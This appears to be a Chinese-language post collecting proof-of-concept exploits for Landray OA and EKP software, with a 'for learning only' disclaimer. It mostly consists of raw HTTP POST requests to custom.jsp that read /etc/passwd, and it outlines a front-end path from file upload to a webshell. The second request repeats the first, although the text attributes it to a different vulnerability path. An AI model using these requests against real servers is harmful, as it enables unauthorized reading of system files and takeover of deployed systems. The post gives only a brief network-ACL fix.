蓝凌漏洞 PoC 整理

吉沃运营专员

本文内容为互联网上收集，禁止用于非法用途，仅供学习使用！

蓝凌 OA 前台代码执行

1. POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
   
2. Host: *.*.*.*
   
3. User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
   
4. Accept: /
   
5. Connection: Keep-Alive
   
6. Content-Length: 42
   
7. Content-Type: application/x-www-form-urlencoded
   
8. 
   
9. var={"body":{"file":"file:///etc/passwd"}}

复制代码

蓝凌 EKP 远程代码执行漏洞

受影响版本

蓝凌EKP V16 (最新版) 受影响存在远程代码执行漏洞，V15 暂无环境验证，可能受影响。

修复方案

使用网络 ACL 限制该 OA 的访问来源，加强监测，重点拦截 GET 请求中带有 ../ 等目录穿越特征的 URL。

通过文件上传 --> 解压 --> 获取 webshell，前台漏洞

漏洞路径：/api///sys/ui/sys_ui_extend/sysUiExtend.do

1. POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
   
2. Host: xxx
   
3. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
   
4. Accept: /
   
5. Connection: Keep-Alive
   
6. Content-Length: 42
   
7. Content-Type: application/x-www-form-urlencoded
   
8. var={"body":{"file":"file:///etc/passwd"}}

复制代码